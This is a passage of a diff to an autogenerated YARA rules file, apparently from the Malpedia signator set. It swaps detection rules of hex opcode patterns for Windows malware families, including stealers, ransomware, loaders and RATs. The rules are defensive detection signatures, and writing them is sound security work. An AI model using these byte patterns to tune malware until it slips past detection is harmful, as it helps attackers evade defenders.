-		$sequence_5 = { 8d4f01 e8???????? 488b4b10 488903 48894308 488b5328 }
-		$sequence_6 = { 57 4154 4157 4883ec70 488bf9 4c8d252b470100 4c8921 }
-		$sequence_7 = { e8???????? 488bcb e8???????? 488b5c2430 48894728 4883c420 5f }
-		$sequence_8 = { 418bc2 c1e810 0fb6c8 418bc3 418bb49670dd0100 48c1e818 4133b48e70d90100 }
-		$sequence_9 = { 488b442468 4c894138 4533c0 48895158 33d2 48894150 4c894940 }
+		$sequence_0 = { 8be5 5d c3 8d48f8 80f903 771e 8b5518 }
+		$sequence_1 = { 8bec 8b4508 8b4810 56 6a0d 6a00 }
+		$sequence_2 = { 56 e8???????? 56 e8???????? 40 50 8b450c }
+		$sequence_3 = { e8???????? 83c418 8986dc020000 85c0 780c 8b4d0c }
+		$sequence_4 = { 85ff 7439 8b550c 85d2 7432 8b4d10 33c0 }
+		$sequence_5 = { 33c0 85d2 741b 8d0c79 53 8d642400 668b1c46 }
+		$sequence_6 = { 80fa03 0f862cffffff 3c34 0f8446ffffff 3c35 0f8460ffffff 8d48c8 }
+		$sequence_7 = { e8???????? 8b4508 8d4df8 51 8d55f0 52 6a00 }
+		$sequence_8 = { 53 56 57 8b7d10 8d8768480000 50 8db768080000 }
+		$sequence_9 = { 51 57 e8???????? 83c410 85c0 7915 8b13 }
 
 	condition:
-		7 of them and filesize < 377856
+		7 of them and filesize < 371712
 }
-rule MALPEDIA_Win_Dmsniff_Auto : FILE
+rule MALPEDIA_Win_Upas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9b02a57-acfd-5696-afff-e1ad9ad00d2f"
+		id = "3b6d6c26-b6c3-53b0-89ad-1bd740f5c4d8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dmsniff_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.upas_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "8d240517eec8ca9f146a8569ec7f531dfedcca5581430f505c0f5f429a443243"
+		logic_hash = "bdfeabc66ac57807ea759a27698eea464658dc61ceaff524f25f379f14603f19"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105106,32 +105524,32 @@ rule MALPEDIA_Win_Dmsniff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7316 8bbdfcfeffff 89fe 46 89b5fcfeffff 899cbd00ffffff 8d85f0feffff }
-		$sequence_1 = { d92c24 83c404 6a00 6a00 68???????? 68???????? }
-		$sequence_2 = { 50 8b10 ff5220 89c7 09ff 0f8563010000 6a00 }
-		$sequence_3 = { 50 8b10 ff5250 89c7 }
-		$sequence_4 = { 47 39f7 72d3 ff45fc 8b45f4 3945fc 72c2 }
-		$sequence_5 = { f7e7 8945ec 50 e8???????? 89c3 }
-		$sequence_6 = { 59 be0f000000 39c6 761a 68???????? e8???????? }
-		$sequence_7 = { 50 ff7508 e8???????? 68???????? e8???????? 50 ff7508 }
-		$sequence_8 = { e8???????? 68???????? e8???????? 89c2 6a00 }
-		$sequence_9 = { 89c3 81e3ff000000 89de 83c661 89f3 881d???????? b803000000 }
+		$sequence_0 = { 7816 8b45f8 8b08 57 ff7508 }
+		$sequence_1 = { 0bcf eb10 85f6 7507 83fa05 }
+		$sequence_2 = { c3 55 8bec 81ec8c0b0000 53 56 }
+		$sequence_3 = { ff35???????? ffd6 85c0 75e7 50 e8???????? 59 }
+		$sequence_4 = { ff15???????? 53 ff15???????? 6800400000 ff75f8 ff75f4 ff15???????? }
+		$sequence_5 = { 8d4438eb 8945dd 33c0 3945f8 7517 ff75f0 }
+		$sequence_6 = { 7410 49 740d 83e909 7410 83e919 }
+		$sequence_7 = { c9 c3 56 57 8d8550faffff 50 }
+		$sequence_8 = { 6a08 ff750c e8???????? 33c0 }
+		$sequence_9 = { 8dbd20ffffff f3a5 0fb74814 8d5c0118 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Lurk_Auto : FILE
+rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42f43514-1d0a-5f85-8b4c-4d2eb84cb8ec"
+		id = "0616b0d8-21b8-54e6-81ea-ef91fe1745e9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lurk_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yakuza_ransomware_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "d1c263745e96efcdbb8910da6861ed00bbaa0d8e2de63a2bd4a743972e1ce722"
+		logic_hash = "406ad1bef978847d25a0a40830a76c5748a247c44dcea0c0fe72a568e851fc77"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105145,38 +105563,32 @@ rule MALPEDIA_Win_Lurk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7508 ff15???????? 8b35???????? 50 ff7508 }
-		$sequence_1 = { 8b4508 5b 5f 5e c9 c3 55 }
-		$sequence_2 = { 8908 8b4514 85c0 7407 8b4e28 03cf }
-		$sequence_3 = { 0f84e0000000 8b45fc 8b4dd8 03480c 51 ff55f4 }
-		$sequence_4 = { 8955f4 837df404 7325 8b4df0 }
-		$sequence_5 = { 80780500 8d45fc 7404 6a00 eb02 6a01 50 }
-		$sequence_6 = { 5f 5e c9 c20400 a1???????? 32c9 384802 }
-		$sequence_7 = { eb29 837d0803 7504 6a03 eb08 837d0804 7519 }
-		$sequence_8 = { c9 c3 6afe eb02 6afd }
-		$sequence_9 = { 8945cc 8b45fc 83c008 8945f0 }
-		$sequence_10 = { 8945fc e8???????? c745f801000000 2975f8 }
-		$sequence_11 = { a1???????? 385805 744f 53 53 }
-		$sequence_12 = { 8945d0 8b45f8 895dd4 8945d8 8b3d???????? }
-		$sequence_13 = { 8955f0 8b45f4 8b4814 c1e11f c1f91f 7412 }
-		$sequence_14 = { 8955f0 e9???????? 8b55fc 8b45ec }
-		$sequence_15 = { 8945d4 837dd400 7513 8b45d8 }
+		$sequence_0 = { e8???????? 83c404 c645fc5b 56 8bd0 8d8d20fbffff e8???????? }
+		$sequence_1 = { e8???????? 8d8520ffffff 83bd34ffffff08 0f438520ffffff 8d8dd8fbffff 51 }
+		$sequence_2 = { 50 e8???????? 0fb74c242c 8d7f02 83c414 85c0 b8ffff0000 }
+		$sequence_3 = { e9???????? c3 8b4568 83e002 0f840c000000 836568fd 8d4d48 }
+		$sequence_4 = { e9???????? c3 8b4dec 81c180000000 e9???????? 8b4d08 83c104 }
+		$sequence_5 = { 0fb6c9 0fb689409c4d00 3304cdd2735400 8b4df8 8b55fc 8b4c8a08 c1e900 }
+		$sequence_6 = { e8???????? 84c0 0f84d0010000 8d8d54f6ffff e8???????? 8bf0 89b5d4f1ffff }
+		$sequence_7 = { e8???????? c745fc00000000 8b4e24 85c9 7466 8b01 8d55dc }
+		$sequence_8 = { ff7508 8d45a8 50 8d4de0 e8???????? 8bf0 8d4e04 }
+		$sequence_9 = { 50 c745ac00000000 c745b007000000 e8???????? 837f1408 8bc7 7202 }
 
 	condition:
-		7 of them and filesize < 5316608
+		7 of them and filesize < 2811904
 }
-rule MALPEDIA_Win_Tollbooth_Auto : FILE
+rule MALPEDIA_Win_Scarabey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8571d861-b206-5a28-be63-4a9911495781"
+		id = "df55f2c4-936e-5089-bf63-ab8881b2ccec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tollbooth"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tollbooth_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scarabey_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "55924965cb8b6210eb05a8f6dd43f9ad6aeae8d8c356e1fd55efb53f124eaedf"
+		logic_hash = "ab0b8e9df053b2dde174abe1928026d6e032765d40449a0cf5be9cf6e0235b67"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105190,32 +105602,32 @@ rule MALPEDIA_Win_Tollbooth_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 4885c0 0f8428010000 488d7827 4883e7e0 488947f8 4c8b442420 }
-		$sequence_1 = { eb67 41baa0860100 413bea 7207 bb06000000 eb55 41ba10270000 }
-		$sequence_2 = { 7451 488b7d07 488b4dff 48894dbf 488bd7 482bd1 48c1fa04 }
-		$sequence_3 = { e9???????? 488d8ab8000000 e9???????? 488d8a68000000 e9???????? 488d8ad8000000 e9???????? }
-		$sequence_4 = { 4885ff 757e eb03 498bfe 807e2400 7413 e8???????? }
-		$sequence_5 = { 803902 7558 488b4908 488b5108 483b5110 7421 0fb645e0 }
-		$sequence_6 = { 48895c2450 48895c2460 48c74424680f000000 41b80a000000 488d1566350900 488d4c2450 e8???????? }
-		$sequence_7 = { 898b88000000 83bb8800000003 0f8286000000 8b8bf4160000 0fb69388000000 488b83f8160000 80ea03 }
-		$sequence_8 = { eb4d 488b8100010000 4885c0 7403 f0ff08 488d055d200300 48899900010000 }
-		$sequence_9 = { 83e11f 418bd7 81c101010000 41c1ef05 83e21f 418bc7 41894d7c }
+		$sequence_0 = { 6a01 ff5004 899e58030000 e9???????? c78778010000acab5700 }
+		$sequence_1 = { 51 50 8d45c0 50 ffd7 897598 c74594fc2f5300 }
+		$sequence_2 = { 51 ff15???????? 8d8dc0d6ffff e8???????? 8b95c0d6ffff 52 }
+		$sequence_3 = { 8b442408 8b4c2404 6a00 6a00 6a00 6a00 50 }
+		$sequence_4 = { ff15???????? 6a01 8d8d14d1ffff 51 ff15???????? 6a00 6a00 }
+		$sequence_5 = { 894608 89460c c706???????? c74604???????? c74610541e5300 e8???????? 8bc6 }
+		$sequence_6 = { e9???????? 837dec00 0f851a010000 6683f80c 0f8510010000 6a0a }
+		$sequence_7 = { 8bf0 83f907 7771 ff248d690c4700 4e eb26 }
+		$sequence_8 = { c745bc06000000 897dd0 c745c404885300 c745cc64000000 ff9060010000 }
+		$sequence_9 = { c745cc18405300 e8???????? 33c0 40 e8???????? c20400 6a08 }
 
 	condition:
-		7 of them and filesize < 1907712
+		7 of them and filesize < 3580928
 }
-rule MALPEDIA_Win_Glooxmail_Auto : FILE
+rule MALPEDIA_Win_Ceeloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "69068c2d-618b-514f-89ee-0c12a27c7775"
+		id = "33871f14-7cee-5da9-9ebd-8890978a4d51"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glooxmail_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ceeloader_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "fd925824bd22779b63be73d9209717bd4d4f69fd8a16644a721055340873e4d2"
+		logic_hash = "4d0387a20d12583a262adee6bbac65a30e624cee690a9f69b13de10eb064ad76"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105229,32 +105641,32 @@ rule MALPEDIA_Win_Glooxmail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d55c0 52 8d9564ffffff c645fc4a 8b01 52 ff5044 }
-		$sequence_1 = { e8???????? 385df3 7407 c745ec40000000 68???????? 8d8d7cffffff e8???????? }
-		$sequence_2 = { 6a01 8d8c24f0020000 81e3fff7ffff e8???????? f7c300040000 740f 56 }
-		$sequence_3 = { 8d4dd8 e9???????? 8b4d08 e9???????? 8b4508 054c040000 e9???????? }
-		$sequence_4 = { 814df000020000 68???????? 8d4db4 e8???????? 8d85b8feffff 50 8d45b4 }
-		$sequence_5 = { 83a50cfffffff7 8d8d30feffff e9???????? c3 8d4db8 e9???????? 8d8dd8feffff }
-		$sequence_6 = { 8bfb e8???????? 33f6 33ff 56 47 57 }
-		$sequence_7 = { 895dcc f645d008 740e 8365d0f7 53 57 8d4d84 }
-		$sequence_8 = { ff750c 83a424bc00000000 8d442430 50 e8???????? }
-		$sequence_9 = { e8???????? c78424600800006d000000 f744241000000080 7417 81642410ffffff7f 53 }
+		$sequence_0 = { 0bd3 3bce 8bf5 23fd 0bda 8bde 0bd3 }
+		$sequence_1 = { 48c744242000000000 e8???????? 89842438020000 488b8c2440020000 e8???????? c784249402000000000000 8944243c }
+		$sequence_2 = { 4883ec20 8bd9 4c8d0dc9f60700 b904000000 4c8d05b5f60700 488d15f6d80700 e8???????? }
+		$sequence_3 = { c7842424060000043b0000 c7842420060000660d0000 c784241c060000a2780000 c784241806000079050000 c784241406000042520000 c78424100600002b350000 c784240c06000015070000 }
+		$sequence_4 = { 89ca 2315???????? 8915???????? 0faf0d???????? 030d???????? 8b15???????? 448b05???????? }
+		$sequence_5 = { 83393f 0f837c030000 31c0 89c1 b820000000 89c2 41b800100000 }
+		$sequence_6 = { 89842444090000 8b842444090000 357a620000 89842488070000 c7842484070000d86c0000 c7842480070000e3710000 c784247c070000c1470000 }
+		$sequence_7 = { 448984242c010000 e9???????? 488b8424e8000000 488b00 8b8c24f0000000 }
+		$sequence_8 = { 89842400060000 8b8424dc0b0000 4189c1 4181e1ff010000 44898c242c0d0000 448b8c242c0d0000 41c1e106 }
+		$sequence_9 = { 898424800c0000 ff15???????? 89842488040000 8b8424780c0000 0b84247c0c0000 898424800c0000 8b8424800c0000 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 2321408
 }
-rule MALPEDIA_Win_Virdetdoor_Auto : FILE
+rule MALPEDIA_Win_Ninerat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bddd89ab-b028-56e4-8a65-8d3729c122ca"
+		id = "b2759270-ef98-5410-b5fe-ea53f4bf72fd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virdetdoor_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ninerat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ninerat_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "57c5b5ddcc0bcf4c5308e3cdd78b8a805ec821f22a4427e25f940eedfad4c1ef"
+		logic_hash = "584fb25ea88956dd53544245e507dba7752ef5bd9498b76883c7fb9cf338d1d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105268,34 +105680,40 @@ rule MALPEDIA_Win_Virdetdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 83feff 7502 33f6 }
-		$sequence_1 = { 0fb74714 50 ff15???????? 0fb7c0 50 }
-		$sequence_2 = { 59 3945fc 7e4e 397dfc 7e49 8b35???????? 68???????? }
-		$sequence_3 = { 53 56 57 8bf9 c745f810270000 33db 33c9 }
-		$sequence_4 = { 6a0c 50 52 51 ff15???????? }
-		$sequence_5 = { 8b7d10 57 7434 8b35???????? ffd6 50 8d45cc }
-		$sequence_6 = { c6010b e9???????? c6010c e9???????? c6010d e9???????? }
-		$sequence_7 = { 83c40c 83c01c 50 6a08 ff15???????? }
-		$sequence_8 = { 3bc1 75ec 3903 74d2 ebe6 85ff 75cc }
-		$sequence_9 = { ff35???????? ff15???????? 8bc8 85c9 7450 6a5c }
+		$sequence_0 = { 4c89ad58feffff 48894d10 48895518 488b4518 48c70000000000 48c7400800000000 48c78590feffff00000000 }
+		$sequence_1 = { 4c89ad60ffffff 4c89b568ffffff 4c89bd70ffffff 48894d10 }
+		$sequence_2 = { 4c89ad58ffffff 4c89b560ffffff 4c89bd68ffffff 48894d10 4889d3 4d89c4 498bd4 }
+		$sequence_3 = { 4c89ad50ffffff 4c89b558ffffff 4c89bd60ffffff 48894d10 4889d6 c68570ffffff00 488d4580 }
+		$sequence_4 = { 4c89ad68fcffff 4c89b570fcffff 4c89bd78fcffff 48894d10 }
+		$sequence_5 = { 4c89ad50ffffff 4c89b558ffffff 4c89bd60ffffff 48895518 4989cc 48c70200000000 4889d1 }
+		$sequence_6 = { 4c89ad60feffff 4c89b568feffff 48894d10 488d4d10 e8???????? 48898570feffff }
+		$sequence_7 = { 4c89ad58fdffff 4c89b560fdffff 4c89bd68fdffff 48895518 4c894520 4c894d28 }
+		$sequence_8 = { eb0f 488bd3 488d0d48900100 e8???????? }
+		$sequence_9 = { 4889842430020000 4c89642450 488b442450 4889842438020000 }
+		$sequence_10 = { 4889842480000000 488d1529890100 488d8c2480000000 e8???????? 90 e8???????? 90 }
+		$sequence_11 = { 488d842430030000 48ffc7 6644393478 75f6 }
+		$sequence_12 = { 4883ec38 834c2448ff 488d05a8580100 4d85c9 }
+		$sequence_13 = { 4a8b04e8 42385cf839 0f84c2000000 488d058dde0000 4a8b0ce8 }
+		$sequence_14 = { 418bd4 e8???????? f20f1000 8b5808 e9???????? 488d05cbdd0000 }
+		$sequence_15 = { 83fa04 7c39 458bd1 49c1ea02 418bc2 f7d8 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 7709696
 }
-rule MALPEDIA_Win_Vobfus_Auto : FILE
+rule MALPEDIA_Win_Duuzer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42158425-a27c-57e2-bcf0-e9d26bb44ebe"
+		id = "ce410d90-c1fc-5e24-b6fe-acbef7b75a62"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vobfus_auto.yar#L1-L228"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.duuzer_auto.yar#L1-L150"
 		license_url = "N/A"
-		logic_hash = "c01a7c959701e62f162b2189e2ece4b76a685509f6980577800ff6467b1d208b"
+		logic_hash = "dfa72f297db77226dddcb2a3a6d903c9c88217f92848aed80d0a5daab8159948"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -105307,46 +105725,37 @@ rule MALPEDIA_Win_Vobfus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5508 8b92e8000000 8b826c1a0000 50 }
-		$sequence_1 = { 8b5508 8b92e8000000 8b827c040000 50 }
-		$sequence_2 = { 8b5508 8b92e8000000 8b82d81a0000 50 }
-		$sequence_3 = { 8b5508 8b92e8000000 8b82f00b0000 50 }
-		$sequence_4 = { 8bec 8b5508 8b92e8000000 8b82a00d0000 50 50 8b10 }
-		$sequence_5 = { 8b82180b0000 50 50 8b10 ff5204 58 }
-		$sequence_6 = { 55 8bec 8b5508 8b92e8000000 8b82c4040000 50 }
-		$sequence_7 = { 8b5508 8b92e8000000 8b82b41a0000 50 }
-		$sequence_8 = { 78ff 0d50004900 3e3cff 46 }
-		$sequence_9 = { f2ed ec f2ed ec f3ed ebf2 ed }
-		$sequence_10 = { 801800 0808 0006 3401 41 06 1005???????? }
-		$sequence_11 = { f2e8fae6d5f6 d2b5f2bb8ff3 ae 73f3 }
-		$sequence_12 = { 5c f6ac4ff8b54ffb c058fcca 61 }
-		$sequence_13 = { 00e0 c9 8f00 e3ce 97 00e6 d39500e4d19b }
-		$sequence_14 = { d39500e4d19b 00cf c0b200d1c3b600 e6d3 a1???????? 00ec dea600e0d4b3 }
-		$sequence_15 = { 41 06 1001 ff06 0200 0100 }
-		$sequence_16 = { 91 00d5 c19400d6c49500d7 c59900dac999 00e0 }
-		$sequence_17 = { 06 1005???????? 0100 6c 74ff }
-		$sequence_18 = { 7cc8 dc7acd e291 d2e8 }
-		$sequence_19 = { 0100 8a00 0010 4c 0007 }
-		$sequence_20 = { 46 14ff 0470 fe0a }
-		$sequence_21 = { 6c 74ff 801800 0808 }
-		$sequence_22 = { ae 73f3 aa 5c f6ac4ff8b54ffb }
-		$sequence_23 = { 1400 48 0008 78ff 0d50004900 }
+		$sequence_0 = { 83f804 7408 83c8ff e9???????? }
+		$sequence_1 = { 5e c3 397170 74e4 83b9f800000008 48895c2458 }
+		$sequence_2 = { c78598fdffff288c3a55 c7859cfdffff83a89c49 c785a0fdffff9ace29e0 c785a4fdffff5652b72b }
+		$sequence_3 = { b8a2000000 5e 8b4dfc 33cd }
+		$sequence_4 = { 5f c3 4585ff 74d9 4489a70c170000 }
+		$sequence_5 = { c785f0fefeff20964000 c785f4fefeff40964000 c785f8fefeff60964000 c785fcfefeff80964000 c78500fffeffd0964000 }
+		$sequence_6 = { 5f 5d c3 488d0529230100 }
+		$sequence_7 = { 51 56 e8???????? 6a78 8d4de8 }
+		$sequence_8 = { ffd6 a3???????? 85c0 7413 8d8509ffffff }
+		$sequence_9 = { 8d86a4000000 c7465000000100 89464c 837dfc00 752f }
+		$sequence_10 = { 5f 5e 5d c3 488d542470 8bcb }
+		$sequence_11 = { 5e c3 488b4e38 48895c2468 }
+		$sequence_12 = { 5f c3 4585f6 74db }
+		$sequence_13 = { 50 8d0c1e 51 52 }
+		$sequence_14 = { 5f 5d 5b c3 33c9 4c897c2460 }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 491520
 }
-rule MALPEDIA_Win_Crytox_Auto : FILE
+rule MALPEDIA_Win_Cadelspy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b9e5c6f9-e0d6-531a-8dd0-a7fad4a513e9"
+		id = "239b2d97-ceb8-5e5b-be90-aeb9b9fcf209"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crytox_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cadelspy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "79e78c490080a0e53c534d80effb4ddfe05889d0a54f29415d47f44d77b2adb2"
+		logic_hash = "b4d9cbb0d8867220f80a8ce48db839eded436dcbd892904385e6486261b96542"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105360,32 +105769,32 @@ rule MALPEDIA_Win_Crytox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 81fb07100000 0f84fcfcffff e9???????? 81fb0c000200 0f86ebfcffff e9???????? }
-		$sequence_1 = { f72424 897c2414 8b7c2404 69cf182d0700 89c6 b867fb0900 01ca }
-		$sequence_2 = { e8???????? 8945c8 8b45c8 c1f809 89c2 8b45cc c1f809 }
-		$sequence_3 = { e8???????? 395c2430 75e5 8b7c2460 8b442434 31d2 8b5c2430 }
-		$sequence_4 = { c705????????a9bc6600 e9???????? e8???????? 0fb6c0 8983d0470000 8b03 e8???????? }
-		$sequence_5 = { e8???????? 8b4c2418 894104 8b4104 8938 8b4104 c7400400000000 }
-		$sequence_6 = { e8???????? 31c0 eb17 891c24 e8???????? 837d0c00 89f0 }
-		$sequence_7 = { e8???????? 89442404 8b55d8 8b4208 890424 e8???????? 83f80f }
-		$sequence_8 = { e9???????? c744240477bf6600 891c24 e8???????? 85c0 750f c705????????05000000 }
-		$sequence_9 = { e8???????? e9???????? 807b0300 0f84a7000000 a1????????85c07533 e8???????? 480f8eff010000 }
+		$sequence_0 = { 3d01010000 7d0d 8a4c181c 888840360110 40 ebe9 }
+		$sequence_1 = { 7413 50 8b44241c 56 e8???????? 8bf8 59 }
+		$sequence_2 = { 89742424 e8???????? 33c0 bf06020000 57 6689842484040000 8d842486040000 }
+		$sequence_3 = { 8d9c2464020000 e8???????? 68???????? 8d9c2464020000 e8???????? }
+		$sequence_4 = { 8d859e000000 50 e8???????? 83c40c 56 8d859c000000 50 }
+		$sequence_5 = { 89742424 89742428 8974242c 89742430 89742434 89742438 e8???????? }
+		$sequence_6 = { 56 57 33ff 8db7b03e0110 ff36 e8???????? }
+		$sequence_7 = { ff742414 ffd3 8bc6 e8???????? 33c0 40 eb02 }
+		$sequence_8 = { 40 8b8d94260000 5f 5e 33cd 5b e8???????? }
+		$sequence_9 = { 39742414 0f84d3000000 397508 7474 8b4508 }
 
 	condition:
-		7 of them and filesize < 6156288
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Katz_Stealer_Auto : FILE
+rule MALPEDIA_Win_Catb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c49e5ae3-476e-56a3-98bc-9b636f776fa6"
+		id = "933995f2-f16f-57d3-8dbf-a34d98a15a16"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.katz_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.katz_stealer_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.catb_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "fd471cd54233791d0b513e7355b1bd82a81ef2e5ff3948f16fb07b4227562780"
+		logic_hash = "67c973c178a5aaefb496aaca8211cbe6cac87c68d3dfe20d86da6ecd47acde94"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -105399,32 +105808,32 @@ rule MALPEDIA_Win_Katz_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd5 85c0 7516 6aff 5a 488b8c2480000000 ff15???????? }
-		$sequence_1 = { 31c9 e8???????? 4893 e9???????? 85f6 }
-		$sequence_2 = { 0f8517ffffff e9???????? 4889f9 ff15???????? 83f8ff 0f84ba030000 85db }
-		$sequence_3 = { 488b4c2470 e8???????? 488b5c2450 8b742460 39b42480000000 }
-		$sequence_4 = { e9???????? 4885d2 0f8429ffffff 488d0562f30000 4889842490000000 4c8b842490000000 }
-		$sequence_5 = { e8???????? 66490f6ec5 66480f6ee7 4889f1 f20f5ec4 488d15dab00000 f20f5905???????? }
-		$sequence_6 = { 488b8424b0070000 488d15663a0000 4889d9 488b04f8 448b4004 e8???????? }
-		$sequence_7 = { f3ab 488d15f64c0000 4889f1 488dbc2494050000 e8???????? 4885c0 7449 }
-		$sequence_8 = { 4c89c7 f3ab 488d0d075d0000 48b80100000006000000 4889842490020000 4c8d8c2480010000 }
-		$sequence_9 = { 4489c8 4883c468 5b 5e c3 f6c701 0f8477010000 }
+		$sequence_0 = { 0f8491000000 498bc5 4c8d0d5d58ffff 83e03f 498bd5 }
+		$sequence_1 = { eb1f be07000000 488d15ef9e0000 448bc6 488bcf e8???????? 85c0 }
+		$sequence_2 = { 488d1db6a90300 488d3537fe0000 48895c2420 488d05aba90300 483bd8 7419 483933 }
+		$sequence_3 = { 4c8d0da47f0000 b903000000 4c8d05907f0000 488d15f9750000 e8???????? 4885c0 740f }
+		$sequence_4 = { 48895c2408 4889742410 57 4883ec20 418bf0 4c8d0d8fcf0000 }
+		$sequence_5 = { 7832 3b0d???????? 732a 4863c9 4c8d05e89f0300 488bc1 }
+		$sequence_6 = { 4c8d0d757d0000 488bd9 488d156b7d0000 b916000000 4c8d05577d0000 e8???????? 488bcb }
